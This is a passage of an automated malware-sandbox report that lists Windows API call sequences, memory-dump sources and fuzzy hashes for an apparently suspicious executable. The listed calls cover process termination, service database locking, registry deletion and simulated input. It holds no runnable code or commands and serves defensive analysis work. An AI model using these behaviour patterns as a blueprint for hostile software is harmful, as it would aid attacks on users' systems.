                        • TerminateThread.KERNEL32(?,000001F6), ref: 0044B689
                        • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B697
                          • Part of subcall function 004356CD: CloseHandle.KERNEL32(00000000), ref: 004356D9
                        • InterlockedExchange.KERNEL32(0042A369,000001F6), ref: 0044B6AC
                        • LeaveCriticalSection.KERNEL32(0042A321), ref: 0044B6AF
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                        • String ID:
                        • API String ID: 3495660284-0
                        • Opcode ID: 7ab0c325316775d38e8d9aa2ca09049d0c02a968ddf60f226b23d446a35990e5
                        • Instruction ID: 3e278a896620ffa5fdfd5bcc44ba61fc9bc9ab212b345b13b81bb6ec37c91fca
                        • Opcode Fuzzy Hash: 7ab0c325316775d38e8d9aa2ca09049d0c02a968ddf60f226b23d446a35990e5
                        • Instruction Fuzzy Hash: E3F0F672141206BBD210AB24EE89DBFB37CFF44315F41096AF60142550CB75F811CBBA
                        APIs
                        • PostMessageW.USER32 ref: 00437127
                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00437140
                        • GetWindowThreadProcessId.USER32(?,?), ref: 00437150
                        • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 00437162
                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 0043716D
                        • CloseHandle.KERNEL32(00000000), ref: 00437174
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                        • String ID:
                        • API String ID: 839392675-0
                        • Opcode ID: 9671eea5464782d863345c1ba519a7d6af1158a8c6613e6f42f5b6706bbe0782
                        • Instruction ID: 38550948ec006cf47bed7574f40cc63f5aae242ba43c895826076912260f23cd
                        • Opcode Fuzzy Hash: 9671eea5464782d863345c1ba519a7d6af1158a8c6613e6f42f5b6706bbe0782
                        • Instruction Fuzzy Hash: 37F054352813117BE6215B109E4EFEF37A8AF49F02F104828FB41B51D0E7E469458BAE
                        APIs
                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000008,004A8E80,BC000000,00431B28,C:\Users\user\AppData\Local\Temp\zwuonypqu.exe,00000004), ref: 00436055
                        • LockServiceDatabase.ADVAPI32(00000000), ref: 00436062
                        • UnlockServiceDatabase.ADVAPI32(00000000), ref: 0043606D
                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00436076
                        • GetLastError.KERNEL32 ref: 00436081
                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00436091
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Service$CloseDatabaseHandle$ErrorLastLockManagerOpenUnlock
                        • String ID:
                        • API String ID: 1690418490-0
                        • Opcode ID: 49e5e78db470eb3b31ed20f2670ed0ea18d225c835d46e40371f5509899a8be7
                        • Instruction ID: 156e5f382d75df54ba3c5c30185d6bb62b1a9e6e0194ec4ef6b9e4a62dbea0b3
                        • Opcode Fuzzy Hash: 49e5e78db470eb3b31ed20f2670ed0ea18d225c835d46e40371f5509899a8be7
                        • Instruction Fuzzy Hash: 9BE0E5319821216BC6231B30AE4DBCF3B99DB1F311F041827F701D2250CB998404DBA8
                        APIs
                          • Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82
                        • CoInitialize.OLE32(00000000), ref: 00475B71
                        • CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 00475B8A
                        • CoUninitialize.OLE32 ref: 00475D71
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: CreateInitializeInstanceUninitialize_wcslen
                        • String ID: .lnk$HH
                        • API String ID: 886957087-3121654589
                        • Opcode ID: 75a96ccae25093af7e6917375c938c281093df7f6cda4de25b1c017a61ab28fd
                        • Instruction ID: f4d7caca580305710a2a5ca379fd8543151c5613ecc12b631d1ff665410dc3a0
                        • Opcode Fuzzy Hash: 75a96ccae25093af7e6917375c938c281093df7f6cda4de25b1c017a61ab28fd
                        • Instruction Fuzzy Hash: B0819D75604300AFD310EF65CC82F5AB3A9EF88704F50892DF658AF2D2D6B5E905CB99
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Menu$Delete$InfoItem_memset
                        • String ID: 0
                        • API String ID: 1173514356-4108050209
                        • Opcode ID: e31d5a25326cfad936127cde49464cb56a2d17833d4ec3f4ad79405d5b41ed43
                        • Instruction ID: b3a4179b3c174fb1a3aa0d908437eb3f68f1f523a6631853a4ee88e897a1c7ed
                        • Opcode Fuzzy Hash: e31d5a25326cfad936127cde49464cb56a2d17833d4ec3f4ad79405d5b41ed43
                        • Instruction Fuzzy Hash: 31418CB55043019BD710CF19C884B5BBBE5AFC5324F148A6EFCA49B282C375E809CBA6
                        APIs
                          • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469368
                        • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00469379
                        • SendMessageW.USER32(?,?,00000000,00000000), ref: 004693AB
                          • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: MessageSend$_wcslen
                        • String ID: ComboBox$ListBox
                        • API String ID: 763830540-1403004172
                        • Opcode ID: 0e5f7948f0b4dfd490a1d730879062bd8f87fe3f6cce9961d177ee1dbc271def
                        • Instruction ID: 8c71ebf423f389569590ff88e643f185c263fd61562863516bde62979c95be4e
                        • Opcode Fuzzy Hash: 0e5f7948f0b4dfd490a1d730879062bd8f87fe3f6cce9961d177ee1dbc271def
                        • Instruction Fuzzy Hash: E0210C7160020067C210BB3A9C46FAF77989B85364F09052FF959AB3D1EA7CE94A436E
                        APIs
                        • GetStdHandle.KERNEL32(?), ref: 004439B4
                          • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(0000002C,00000000,00000000,00000002,756F13E0,00000000,004437E2,?,0000002C,00000000,?,?,?), ref: 004356BD
                          • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(?,00000000,?,?,?), ref: 004356C1
                          • Part of subcall function 0043569D: DuplicateHandle.KERNEL32 ref: 004356C4
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: CurrentHandleProcess$Duplicate
                        • String ID: nul
                        • API String ID: 2124370227-2873401336
                        • Opcode ID: 1f0ba76bcec97c73efa3faab39b1dec00fe260a428cb25b20c1b65e4e3d5eb1c
                        • Instruction ID: e5202fea31d744cc2812a948a395a4146b23d8233fafbd02014e3d546f800e0b
                        • Opcode Fuzzy Hash: 1f0ba76bcec97c73efa3faab39b1dec00fe260a428cb25b20c1b65e4e3d5eb1c
                        • Instruction Fuzzy Hash: 8921A070104301ABE320DF28D886B9B77E4AF94B24F504E1EF9D4972D1E3B5DA54CBA6
                        APIs
                        • GetStdHandle.KERNEL32(000000F6), ref: 004438B7
                          • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(0000002C,00000000,00000000,00000002,756F13E0,00000000,004437E2,?,0000002C,00000000,?,?,?), ref: 004356BD
                          • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(?,00000000,?,?,?), ref: 004356C1
                          • Part of subcall function 0043569D: DuplicateHandle.KERNEL32 ref: 004356C4
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: CurrentHandleProcess$Duplicate
                        • String ID: nul
                        • API String ID: 2124370227-2873401336
                        • Opcode ID: 1c1504a6ed80816e8cc684f5e798812a6452e5ed6eae5ac994518d836d8835bd
                        • Instruction ID: 183321404fa0000a7fb955016a75d3ae5bd0bbc3c7f5d4043dd6f74a8503dfc6
                        • Opcode Fuzzy Hash: 1c1504a6ed80816e8cc684f5e798812a6452e5ed6eae5ac994518d836d8835bd
                        • Instruction Fuzzy Hash: 4E2182701002019BE210DF28DC45F9BB7E4AF54B34F204A1EF9E4962D0E7759654CB56
                        APIs
                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00441333
                        • LoadLibraryW.KERNEL32(?,?,?,?,0047B4D0,?,?,?,?,?,?,?,?,?,00000000), ref: 0044133A
                        • SendMessageW.USER32(?,00000467,00000000,?), ref: 00441352
                        • DestroyWindow.USER32 ref: 0044135B
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: MessageSend$DestroyLibraryLoadWindow
                        • String ID: SysAnimate32
                        • API String ID: 3529120543-1011021900
                        • Opcode ID: 7eb070968e116bc4f0d30e0eba70c7f8d943bdaa5f5f9b6b4db71aa758301bcd
                        • Instruction ID: 28effd0bdeb99d0e0a50349a2d6ccdc4655b9339127a2247ff1827a793b197f6
                        • Opcode Fuzzy Hash: 7eb070968e116bc4f0d30e0eba70c7f8d943bdaa5f5f9b6b4db71aa758301bcd
                        • Instruction Fuzzy Hash: D0216271204301ABF7209AA5DC84F6B73ECEBD9724F104A1EF651D72E0D6B4DC818729
                        APIs
                        • PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000001), ref: 0044304E
                        • TranslateMessage.USER32(?), ref: 0044308B
                        • DispatchMessageW.USER32(?), ref: 00443096
                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004430AD
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Message$Peek$DispatchTranslate
                        • String ID: *.*
                        • API String ID: 1795658109-438819550
                        • Opcode ID: a5394e60fa5dc12563cec3cf09e66162f870e5be06c650d2d1f2ad27f88770fd
                        • Instruction ID: a39ada88e739a490af96418dc0f35d82e94fc94c1e76e22fe960a83301852fb1
                        • Opcode Fuzzy Hash: a5394e60fa5dc12563cec3cf09e66162f870e5be06c650d2d1f2ad27f88770fd
                        • Instruction Fuzzy Hash: 9F2138715183419EF720DF289C80FA3B7949B60B05F008ABFF66492191E6B99608C76E
                        APIs
                          • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                          • Part of subcall function 004389A1: SendMessageTimeoutW.USER32(00000001,00000000,00000000,00000000,00000002,00001388,004848E8), ref: 004389C0
                          • Part of subcall function 004389A1: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 004389D3
                          • Part of subcall function 004389A1: GetCurrentThreadId.KERNEL32(00000000), ref: 004389DA
                          • Part of subcall function 004389A1: AttachThreadInput.USER32(00000000), ref: 004389E1
                        • GetFocus.USER32(?,00000001,004848E8,004848E8,?), ref: 004609EF
                          • Part of subcall function 004389EB: GetParent.USER32(?), ref: 004389F7
                          • Part of subcall function 004389EB: GetParent.USER32(?), ref: 00438A04
                        • GetClassNameW.USER32(?,?,00000100), ref: 00460A37
                        • EnumChildWindows.USER32 ref: 00460A60
                        • __swprintf.LIBCMT ref: 00460A7A
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_wcslen
                        • String ID: %s%d
                        • API String ID: 991886796-1110647743
                        • Opcode ID: 4a64ff5b06e5e341b473abb9bc2bdd7182ed8da111ba9effa567358a3114916c
                        • Instruction ID: 20a4aa43144560c0524e92d1094e5dcb4402c89d1d481f65a72662ac57dae138
                        • Opcode Fuzzy Hash: 4a64ff5b06e5e341b473abb9bc2bdd7182ed8da111ba9effa567358a3114916c
                        • Instruction Fuzzy Hash: 7521A4712403046BD610FB65DC8AFEFB7ACAF98704F00481FF559A7181EAB8A509877A
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: _memset$_sprintf
                        • String ID: %02X
                        • API String ID: 891462717-436463671
                        • Opcode ID: 3d61b25fa3990800e5a694d7793c27d494b4b6e65897825e99c1223689708875
                        • Instruction ID: c3235ccac5cd273424cb9b73a8b9e0f10e05fa8943de770f4571b5c3e9b76774
                        • Opcode Fuzzy Hash: 3d61b25fa3990800e5a694d7793c27d494b4b6e65897825e99c1223689708875
                        • Instruction Fuzzy Hash: 5B11E97225021167D314FA698C93BEE724CAB45704F50453FF541A75C1EF6CB558839E
                        APIs
                        • _memset.LIBCMT ref: 0042CD00
                        • GetOpenFileNameW.COMDLG32 ref: 0042CD51
                          • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\AppData\Local\Temp\zwuonypqu.exe,?,C:\Users\user\AppData\Local\Temp\zwuonypqu.exe,004A8E80,C:\Users\user\AppData\Local\Temp\zwuonypqu.exe,0040F3D2), ref: 0040FFCA
                          • Part of subcall function 00410130: SHGetMalloc.SHELL32(00000000), ref: 0041013A
                          • Part of subcall function 00410130: SHGetDesktopFolder.SHELL32(?), ref: 00410150
                          • Part of subcall function 00410130: _wcscpy.LIBCMT ref: 00410160
                          • Part of subcall function 00410130: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410197
                          • Part of subcall function 00410130: _wcscpy.LIBCMT ref: 004101AC
                          • Part of subcall function 00410020: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 00410037
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: NamePath$Full_wcscpy$DesktopFileFolderFromListMallocOpen_memset
                        • String ID: $OH$@OH$X
                        • API String ID: 3491138722-1394974532
                        • Opcode ID: b307b7495d9e484b77ad3edce91dc90ef7c994e26f1a80758083a935cdf7c966
                        • Instruction ID: e3e81f3fa603e1d093c5df9e9287f390c0398a0e5563e0e16fb911f44c5f658a
                        • Opcode Fuzzy Hash: b307b7495d9e484b77ad3edce91dc90ef7c994e26f1a80758083a935cdf7c966
                        • Instruction Fuzzy Hash: 2111C2B02043405BC311EF19984175FBBE9AFD5308F14882EF68497292D7FD854DCB9A
                        APIs
                        • LoadLibraryW.KERNEL32(00000000), ref: 00463DD1
                        • GetProcAddress.KERNEL32(?,?,?,?,?), ref: 00463E68
                        • GetProcAddress.KERNEL32(?,00000000,?), ref: 00463E84
                        • GetProcAddress.KERNEL32(?,?,?,?,00000041,?,?,00000000,?), ref: 00463ECE
                        • FreeLibrary.KERNEL32(?,?,?,00000000,?), ref: 00463EF0
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: AddressProc$Library$FreeLoad
                        • String ID:
                        • API String ID: 2449869053-0
                        • Opcode ID: fa0419033c450d646a7a4ef883371915f5dff59722895d189eba4af2447b2958
                        • Instruction ID: 5a5949aabc30296464acd143044f95cbdcafad8a77d2d24e7d672d776762960f
                        • Opcode Fuzzy Hash: fa0419033c450d646a7a4ef883371915f5dff59722895d189eba4af2447b2958
                        • Instruction Fuzzy Hash: 9051C1752043409FC300EF25C881A5BB7A4FF89305F00456EF945A73A2DB79EE45CBAA
                        APIs
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: KeyboardMessagePostState$InputSend
                        • String ID:
                        • API String ID: 3031425849-0
                        • Opcode ID: b49b686b41cf8e4dc8898cf8a112ca1a8544ab09a95107e5a7613c5accf95fc9
                        • Instruction ID: f46f63d78903415e516a46676784f6fcea1caa301ceb581e17347d916cd8316d
                        • Opcode Fuzzy Hash: b49b686b41cf8e4dc8898cf8a112ca1a8544ab09a95107e5a7613c5accf95fc9
                        • Instruction Fuzzy Hash: DB413B715462446FF760AB24D944BBFBB94AF99324F04061FF9D4122C2D37D9908C77A
                        APIs
                        • RegEnumKeyExW.ADVAPI32 ref: 004422F0
                        • RegOpenKeyExW.ADVAPI32 ref: 0044232B
                        • RegCloseKey.ADVAPI32(00000000), ref: 0044234E
                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00442390
                        • RegEnumKeyExW.ADVAPI32(?,00000000), ref: 004423C0
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Enum$CloseDeleteOpen
                        • String ID:
                        • API String ID: 2095303065-0
                        • Opcode ID: 367b6e42355be36f427f5e4c5f923650598af64a8eac08207e4f2af605b886a1
                        • Instruction ID: 24d8057b763805d248a02a33893b377b1579bd56aab3fff97e90bb3d062a49ad
                        • Opcode Fuzzy Hash: 367b6e42355be36f427f5e4c5f923650598af64a8eac08207e4f2af605b886a1
                        • Instruction Fuzzy Hash: 0C3150721043056EE210DF94DD84FBF73ECEBC9314F44492EBA9596141D7B8E9098B6A
                        APIs
                        • GetPrivateProfileSectionW.KERNEL32 ref: 0045C2F4
                        • GetPrivateProfileSectionW.KERNEL32 ref: 0045C31B
                        • WritePrivateProfileSectionW.KERNEL32 ref: 0045C363
                        • WritePrivateProfileStringW.KERNEL32 ref: 0045C385
                        • WritePrivateProfileStringW.KERNEL32 ref: 0045C392
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: PrivateProfile$SectionWrite$String
                        • String ID:
                        • API String ID: 2832842796-0
                        • Opcode ID: c76cc1094b5fb1fc43fcb7877a7661b5ae667b5fa7796de5023eb6f45200691f
                        • Instruction ID: eb365ed5c03c4bb3a44f9ddbc5128f2f56e5f8affd5b6ace934fe40af23b551f
                        • Opcode Fuzzy Hash: c76cc1094b5fb1fc43fcb7877a7661b5ae667b5fa7796de5023eb6f45200691f
                        • Instruction Fuzzy Hash: 00318675240305ABD610DFA1DC85F9BB3A8AF84705F00891DF94497292D7B9E889CB94
